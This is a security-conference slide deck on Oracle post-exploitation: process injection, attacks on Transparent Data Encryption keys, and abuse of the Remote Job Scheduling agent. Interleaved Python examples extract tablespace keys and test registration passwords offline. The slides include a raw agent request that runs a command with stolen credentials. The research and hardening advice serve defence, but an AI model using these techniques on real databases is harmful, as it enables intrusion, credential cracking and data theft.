
Oracle post exploitation techniques
László Tóth
donctl@gmail.com

Disclaimer
The views expressed in this presentation are my own and not necessarily the views of my current, past or future employers.

Content
- Introduction
- Everybody knows this, so let's do it quickly
- DLL injection (Windows, Linux)
- Attack cryptographic functions in the database (TDE, dbms_crypto, etc.)
- Remote Job Scheduling

Introduction
- There are many well known techniques for post exploitation
- This presentation will concentrate on own research results
  - DLL injection
  - Transparent Database Encryption
  - JOB scheduling
  - Release of rorakit for PoC

Let's do it quickly
- The common steps
  - Running commands at the operating system level: JAVA, dbms_scheduler, extproc etc.
  - Access files: utl_file, dbms_lob, JAVA etc.
- Less common, but equally, if not more, important
  - Find THE SENSITIVE information in the database
  - Non-DBA access can be enough (hey, we want the DATA)
- Rootkits (somebody saw them in the wild?)

Let's do it quickly
- Rootkits
  - Alex Kornbrust:
    - 1st generation: modify views, stored procedures
    - 2nd generation: e.g. modify the Oracle binaries
    - 3rd generation: modify the SGA
  - David Litchfield:
    - Load DLL
    - Change the system user hash through an exploit
  - Dennis Yurichev:
    - Replace a *.o file in the Oracle libraries:
      ar -x $ORACLE_HOME/lib/libserver11.a kzia.o

Let's do it quickly
An Oracle database stores a relatively high number of passwords, depending on the installed features and applications. For example:
  - EM passwords (Metalink, proxy, MGMT_VIEW, dbsnmp)
  - APEX
  - Scheduler
  - ...

Let's do it quickly
We are talking post exploitation here, so you need the highest privilege

DLL injection
- On Windows we use the well known DLL injection techniques
- On Linux we use ptrace calls to modify the Oracle process to load our library and redirect the given function calls
- The PoC works on 32bit only (64bit will come)

DLL injection
- Linux is more interesting here, because it is not a common technique; on Windows even malware applies the same technique
- I found one example (ssh) in phrack magazine 59
- Lots of things have changed since then in glibc
- It logged the pam calls and it can easily call the real functions from the libraries. (I have only the Oracle executable.)

DLL injection
- On Windows everything is in DLLs
- On Linux the Oracle executable contains almost everything

DLL injection
The injector shellcode, which will be written at the beginning of the isalpha function

DLL injection
Oracle on Windows is multithreaded
  - It's enough to inject only one process
  - You have to define from which module it is called and which module contains the function. If it is called from a different module it won't be redirected
Oracle on Linux is multiprocess
  - You have to inject all processes
  - Every call will be redirected in the injected process

DLL injection
In theory both problems can be solved
  - On Linux the listener process forks an Oracle process when somebody logs in, so we should inject the listener process to detect the creation of the new Oracle processes
  - On Windows we can implement the hijack with the same technique as on Linux
Maybe in a future version

Crypto
I concentrated on cryptography functions
  - DBMS_OBFUSCATION_TOOLKIT
  - DBMS_CRYPTO
  - Lots of crypto in the authentication
  - Transparent Database Encryption
  - Stored passwords in the database

Crypto
Figure: call paths of the two packages
  DBMS_OBFUSCATION_TOOLKIT: DES, 3DES, MD5
  DBMS_CRYPTO: MD5, SHA1, MD4, DES, 3DES, AES
  Both end up in the internal functions LTCH, LTCEENC, LTCEDEC (in the ORACLE executable; on Windows in orancrypt11g.dll and oran11g.dll)
- On Windows it happens through DLLs
- On Linux these are direct calls

Crypto
Based on: http://download.oracle.com/docs/cd/B19306_01/appdev.102/b14258/d_crypto.htm

TDE
- Transparent Database Encryption, introduced in 10g Release 2
- It is part of the Advanced Security Option
- In 10g it can encrypt on a column basis
- In 11g it can encrypt on a tablespace basis

TDE
- The master key is stored in a wallet, outside of the database
- TDE protects the data on the file system, not in the database
- If the wallet is open, the data can be accessed, subject only to the normal access rights

TDE
Figure: column encryption flow. The wallet (ewallet.p12) holds the MasterKey. ENC$ (OBJ#, ..., COLKLC = 41414...) holds the encrypted TableKey; the ORACLE process decrypts the table key with the master key, then decrypts the stored ENCCOL values (34BD..., 65AF...) with the table key, so "select enccol from secret;" returns secret1, secret2.

TDE
Figure: tablespace encryption flow. The wallet (ewallet.p12) holds the MasterKey; the encrypted tablespace key is stored in the tablespace file. The ORACLE process decrypts the tablespace key with the master key, then decrypts the block with the tablespace key, so "select col from secret;" returns secret1, secret2.

TDE
- Oracle handles blocks at the file level
- The tablespace key is at the second block + 0x310 (a block can have various sizes)
Figure: layout at that offset: Key length (2*8 bytes) | Encrypted tablespace key

TDE
The IV is at the beginning of each block
Beginning of the block:
IV: 830080195941200 02 00000000
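As an added worked example (not the slides' own tooling and not code from any Oracle utility), the following Python reads a datafile as fixed-size blocks and pulls out the two items the slides locate: the encrypted tablespace key at the second block + 0x310, and the IV at the beginning of each block. The block size, the key length, the 16-byte IV length and the idea that the first two blocks are file headers are assumptions the slides do not settle; the sample datafile is constructed, not a real Oracle file; and the repeated-IV scan is a practitioner's sanity check on what was read, not a claim about Oracle's implementation.

```python
"""Added example: locate the encrypted tablespace key and per-block IVs in a
TDE-encrypted datafile. Offsets are the ones from the slides; everything else
(block size, key length, 16-byte IV, two header blocks) is an assumption."""

TABLESPACE_KEY_BLOCK = 1        # "the second block", counting from 0
TABLESPACE_KEY_OFFSET = 0x310   # offset inside that block (from the slide)
IV_LEN = 16                     # assumption: AES block size
FIRST_DATA_BLOCK = 2            # assumption: blocks 0 and 1 are file headers


def split_blocks(datafile: bytes, block_size: int) -> list:
    """Oracle handles blocks at the file level; the block size varies, so it is a parameter."""
    if block_size <= 0 or len(datafile) % block_size:
        raise ValueError("datafile length is not a multiple of the block size")
    return [datafile[i:i + block_size] for i in range(0, len(datafile), block_size)]


def encrypted_tablespace_key(datafile: bytes, block_size: int, key_len: int) -> bytes:
    """Bytes of the encrypted tablespace key. key_len is a parameter because the slides
    do not give the encoding of the key-length field that precedes the key."""
    block = split_blocks(datafile, block_size)[TABLESPACE_KEY_BLOCK]
    key = block[TABLESPACE_KEY_OFFSET:TABLESPACE_KEY_OFFSET + key_len]
    if len(key) != key_len:
        raise ValueError("block too small for the key region")
    return key


def block_ivs(datafile: bytes, block_size: int) -> dict:
    """IV at the beginning of each data block, keyed by block number."""
    return {n: blk[:IV_LEN]
            for n, blk in enumerate(split_blocks(datafile, block_size))
            if n >= FIRST_DATA_BLOCK}


def repeated_ivs(ivs: dict) -> dict:
    """Sanity check: the same IV on two blocks encrypted under the same tablespace key
    leaks equal-plaintext prefixes. Returns {iv: [block numbers]} for IVs seen twice or more."""
    seen = {}
    for n, iv in ivs.items():
        seen.setdefault(iv, []).append(n)
    return {iv: blocks for iv, blocks in seen.items() if len(blocks) > 1}


def build_sample_datafile(block_size: int = 8192, data_blocks: int = 3,
                          key: bytes = b"K" * 32, duplicate_iv: bool = False) -> bytes:
    """Constructed sample (not a real Oracle datafile): two zeroed header blocks with the
    key planted at block 1 + 0x310, then data blocks whose IV is the block number;
    duplicate_iv=True makes the second data block reuse the first one's IV."""
    header0 = bytes(block_size)
    header1 = bytearray(block_size)
    header1[TABLESPACE_KEY_OFFSET:TABLESPACE_KEY_OFFSET + len(key)] = key
    body = []
    for n in range(data_blocks):
        iv_value = 0 if (duplicate_iv and n == 1) else n
        iv = iv_value.to_bytes(IV_LEN, "big")
        body.append(iv + bytes([0xA0 + n]) * (block_size - IV_LEN))
    return header0 + bytes(header1) + b"".join(body)


if __name__ == "__main__":
    sample = build_sample_datafile()
    print("encrypted tablespace key:", encrypted_tablespace_key(sample, 8192, 32).hex())
    for n, iv in block_ivs(sample, 8192).items():
        print(f"block {n} IV: {iv.hex()}")
    print("repeated IVs:", repeated_ivs(block_ivs(build_sample_datafile(duplicate_iv=True), 8192)))
```

To use it on a real file, read the datafile into memory, pass the tablespace's actual block size, and compare the extracted key region with what a wallet dumper gives you once the master key is known; if the IVs printed for consecutive blocks ever coincide, treat that as something to investigate rather than as expected behaviour.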

TDE
- Special thanks go to Gergely Tóth who, as a recreational activity, developed an Oracle wallet dumper in Java
- I did a little modification of the orablock tool from David Litchfield's great cadfile toolset to work with my examples
- Special thanks go to Kurt Van Meerbeeck who allowed me to use his excellent jDUDE tool to test my results

TDE
Figure: encrypted column value layout: length of the column; IV (present by default, but can be omitted with "NO SALT"); SHA1 hash for integrity

Remote Job Scheduling
- Introduced in 11g
- It allows running jobs on machines where there is no database installed
- You have to install the Scheduler Agent from the Transparent Gateway disk

Remote Job Scheduling
How it works (Linux):
  - There is the schagent Java program that accepts the connection from the network
  - Schagent calls the jssu executable in the $ORACLE_HOME/bin directory
  - The result is sent back to the database through XDB

Remote Job Scheduling
Security I.
  - The network connection is protected with SSL between the database and the agent
  - An operating system user and password are needed to run a job on the agent's machine
  - To handle the previous point, a new object type called CREDENTIAL was introduced (access can be managed inside the database!)
  - The agent has to be registered into the database

Remote Job Scheduling
Figure: JOB request to the schagent, encrypted with SSL (the server checks the client certificate); JOB results sent to XDB (Oracle XML Database), from 11.2 they can be encrypted

Remote Job Scheduling
The registration happens only once at the beginning, so I concentrated on other parts, but just to show what is happening:
password_hash = HmacSHA1(password+nonce, cert+password+currentTime+hostname)
trkey = SHA1(password+nonce+currentTime+hostname)[1..16]
enc_key = AES(trkey, random generated key)
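The derivation above, carried out with Python's standard library as an added example; this is not the agent's or the database's code. It assumes that the first HmacSHA1 argument on the slide is the HMAC key and that "[1..16]" means the first 16 bytes of the 20-byte SHA1 digest (an AES-128 key size); the final AES step that wraps the random key with trkey is left out because the standard library has no AES. The sample nonce, certificate bytes and timestamp are constructed; only the hostname and password come from the slides. The offline_guess function is my own observation on the formula: the registration password is its only secret, so whoever holds the other four inputs and the hash can test candidate passwords without talking to the agent.

```python
"""Added example: the Remote Job Scheduling registration derivation from the
slide, with hashlib/hmac. Assumptions: HmacSHA1(key, data) argument order,
[1..16] = first 16 digest bytes, AES wrapping step omitted."""

import hashlib
import hmac


def registration_password_hash(password: bytes, nonce: bytes, cert: bytes,
                               current_time: bytes, hostname: bytes) -> bytes:
    # password_hash = HmacSHA1(password+nonce, cert+password+currentTime+hostname)
    return hmac.new(password + nonce,
                    cert + password + current_time + hostname,
                    hashlib.sha1).digest()


def registration_transport_key(password: bytes, nonce: bytes,
                               current_time: bytes, hostname: bytes) -> bytes:
    # trkey = SHA1(password+nonce+currentTime+hostname)[1..16] -> 16 bytes
    return hashlib.sha1(password + nonce + current_time + hostname).digest()[:16]


def verify_registration(candidate: bytes, nonce: bytes, cert: bytes, current_time: bytes,
                        hostname: bytes, expected_hash: bytes) -> bool:
    """What a receiving side can do: recompute the hash for a candidate password
    and compare it in constant time."""
    got = registration_password_hash(candidate, nonce, cert, current_time, hostname)
    return hmac.compare_digest(got, expected_hash)


def offline_guess(candidates, nonce: bytes, cert: bytes, current_time: bytes,
                  hostname: bytes, expected_hash: bytes):
    """The password is the only secret in the derivation: anyone holding the other
    four inputs and the hash can test candidates offline. Returns the match or None."""
    for candidate in candidates:
        if verify_registration(candidate, nonce, cert, current_time, hostname, expected_hash):
            return candidate
    return None


# Constructed sample values (hostname and password from the slides, the rest made up).
SAMPLE = dict(nonce=b"0123456789abcdef",
              cert=b"agent certificate bytes",
              current_time=b"1276000000000",
              hostname=b"o11gr2c")


def demo():
    pw = b"Test1234"
    h = registration_password_hash(pw, **SAMPLE)
    trkey = registration_transport_key(pw, SAMPLE["nonce"],
                                       SAMPLE["current_time"], SAMPLE["hostname"])
    found = offline_guess([b"oracle", b"welcome1", b"Test1234"], expected_hash=h, **SAMPLE)
    return h, trkey, found


if __name__ == "__main__":
    h, trkey, found = demo()
    print("password_hash:", h.hex())
    print("trkey:", trkey.hex())
    print("recovered:", found)
```

The practical consequence for defenders is that the registration password deserves the same strength as any other credential that can be attacked offline, and the registration exchange itself should only ever travel inside the SSL channel the agent provides.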

Remote Job Scheduling
Of course we can log it:
5465737431323334 (hex) = Test1234

Remote Job Scheduling
Security II.
  - Disabling functions
    - DISABLE_PUT_FILE=FALSE
    - DISABLE_GET_FILE=FALSE
    - DISABLE_JOB_EXECUTION=FALSE
  - Restriction of users
    - DENY_USERS=root,administrator,guest
    - ALLOW_USERS=

Remote Job Scheduling
# if this is set to TRUE, only registered databases will be allowed to submit
# jobs and the agent will only be able to register with database versions 11.2
# or higher. This enforces a higher level of security including encryption of
# job results.
SECURE_DATABASES_ONLY=TRUE
Any guess what will be the general practice?

Remote Job Scheduling
- So we can have the username and password (from a hacked database)
- Can we send a request to the agent?
GET / HTTP/1.1
Host: o11gr2c:1500
Source: o11gr2
Source-DB: ORCL
Source-Port: 16021
Action: RUN
Command: /tmp/test.sh
Job-Id: 74601
Job-Name: MYJOB
Job-Subname:
Job-Owner: SYS
Username: oracle
Password: Test1234
Domain:
Request-Id: 1017801477
Credential-Owner: SYS
Credential-Name: LABCRED
Connection: close

Remote Job Scheduling
- We can escalate our privileges to the remote agent
- We can brute-force a password remotely (that is why the user restrictions are important)
- Two other small notes
  - There is a VERSION query
  - It is worth looking closer at the jssu binary
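To make the effect of the Security II settings concrete, here is an added example (a model written for this page, not Oracle's schagent code) that parses a schagent.conf-style fragment and a job request in the header format of the capture above, and decides whether the job would run. It evaluates the request from the slides against the permissive settings the slides show and against a tightened configuration of my own. How the real agent combines DENY_USERS, ALLOW_USERS and SECURE_DATABASES_ONLY is assumed from the configuration comments, the action names PUT_FILE and GET_FILE are assumed (only RUN appears on the slides), and the job account "jobrunner" is a hypothetical name.

```python
"""Added example: model of the agent-side checks described on the slides.
Assumed: ALLOW_USERS is an allow-list when non-empty, DENY_USERS always wins,
SECURE_DATABASES_ONLY rejects Source-DB values that were never registered."""

# The request from the slide, reproduced as the constructed input.
SLIDE_REQUEST = """\
GET / HTTP/1.1
Host: o11gr2c:1500
Source: o11gr2
Source-DB: ORCL
Source-Port: 16021
Action: RUN
Command: /tmp/test.sh
Job-Id: 74601
Job-Name: MYJOB
Job-Subname:
Job-Owner: SYS
Username: oracle
Password: Test1234
Domain:
Request-Id: 1017801477
Credential-Owner: SYS
Credential-Name: LABCRED
Connection: close
"""

# The settings shown on the slides, with SECURE_DATABASES_ONLY left off.
WEAK_CONF = """\
DISABLE_PUT_FILE=FALSE
DISABLE_GET_FILE=FALSE
DISABLE_JOB_EXECUTION=FALSE
DENY_USERS=root,administrator,guest
ALLOW_USERS=
SECURE_DATABASES_ONLY=FALSE
"""

# Suggested tightening: file transfer off, an explicit allow-list with a dedicated
# low-privilege job account (hypothetical name), the software owner denied,
# registered databases only.
HARDENED_CONF = """\
DISABLE_PUT_FILE=TRUE
DISABLE_GET_FILE=TRUE
DISABLE_JOB_EXECUTION=FALSE
DENY_USERS=root,administrator,guest,oracle
ALLOW_USERS=jobrunner
SECURE_DATABASES_ONLY=TRUE
"""

# Assumed mapping from the request's Action to the DISABLE_* switch governing it.
ACTION_SWITCH = {"RUN": "DISABLE_JOB_EXECUTION",
                 "PUT_FILE": "DISABLE_PUT_FILE",
                 "GET_FILE": "DISABLE_GET_FILE"}


def parse_conf(text: str) -> dict:
    """KEY=VALUE lines; '#' comments ignored; keys upper-cased."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        conf[key.strip().upper()] = value.strip()
    return conf


def parse_request(text: str) -> dict:
    """Request line plus 'Name: value' headers, as in the slide's capture."""
    lines = text.strip().splitlines()
    method, path, _version = lines[0].split()
    headers = {"_method": method, "_path": path}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def _csv(value: str) -> set:
    return {item.strip().lower() for item in value.split(",") if item.strip()}


def _on(conf: dict, key: str) -> bool:
    return conf.get(key, "FALSE").strip().upper() == "TRUE"


def evaluate(conf_text: str, request_text: str, registered_dbs) -> tuple:
    """Return (accepted, reason) for one request under one configuration."""
    conf = parse_conf(conf_text)
    req = parse_request(request_text)
    action = req.get("Action", "").upper()
    user = req.get("Username", "").lower()
    switch = ACTION_SWITCH.get(action)
    if switch is None:
        return False, f"unknown action {action!r}"
    if _on(conf, switch):
        return False, f"{action} disabled by {switch}"
    registered = {db.upper() for db in registered_dbs}
    if _on(conf, "SECURE_DATABASES_ONLY") and req.get("Source-DB", "").upper() not in registered:
        return False, "source database not registered"
    if user in _csv(conf.get("DENY_USERS", "")):
        return False, f"user {user!r} in DENY_USERS"
    allowed = _csv(conf.get("ALLOW_USERS", ""))
    if allowed and user not in allowed:
        return False, f"user {user!r} not in ALLOW_USERS"
    return True, f"run {req.get('Command')} as {user!r}"


if __name__ == "__main__":
    print("weak conf, unregistered db:", evaluate(WEAK_CONF, SLIDE_REQUEST, set()))
    print("hardened conf, unregistered db:", evaluate(HARDENED_CONF, SLIDE_REQUEST, set()))
    print("hardened conf, registered db:", evaluate(HARDENED_CONF, SLIDE_REQUEST, {"ORCL"}))
```

With the weak settings the captured request runs /tmp/test.sh as the oracle software owner from any database that can reach the port, which is exactly the remote password brute-force surface the slide warns about; with the tightened settings the same request is refused first because the source database is not registered and, once it is, because the software owner is not an allowed job user.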

Remote Job Scheduling
I know this is just a joke :), but you have a working su, so at least be careful who can run the jssu binary (oinstall group by default)

Remote Job Scheduling
- The user who runs jobs should not have access to su, sudo or the jssu binaries
- If he/she has, he/she can bypass the user restrictions by calling the binaries through a job
- The configuration of the agent should be as restricted as possible

Remote Job Scheduling
OK, but we are talking about post exploitation, and what if SECURE_DATABASES_ONLY=TRUE?

Questions

Summary
- Don't forget THE DATA is important
- We can easily log the crypto functions of Oracle databases
- It was shown how the TDE function can be attacked or recovered
- We analyzed the security of the Remote Job Scheduling feature

URLs
- http://www.soonerorlater.hu/
- http://blogs.conus.info/
- http://www.red-database-security.com/wp/oracle_rootkits_2.0.pdf
- http://www.databasesecurity.com/oracle-backdoors.ppt
- http://www.databasesecurity.com/dbsec/Locating-Dropped-Objects.pdf
- http://www.codeproject.com/KB/threads/completeinject.aspx
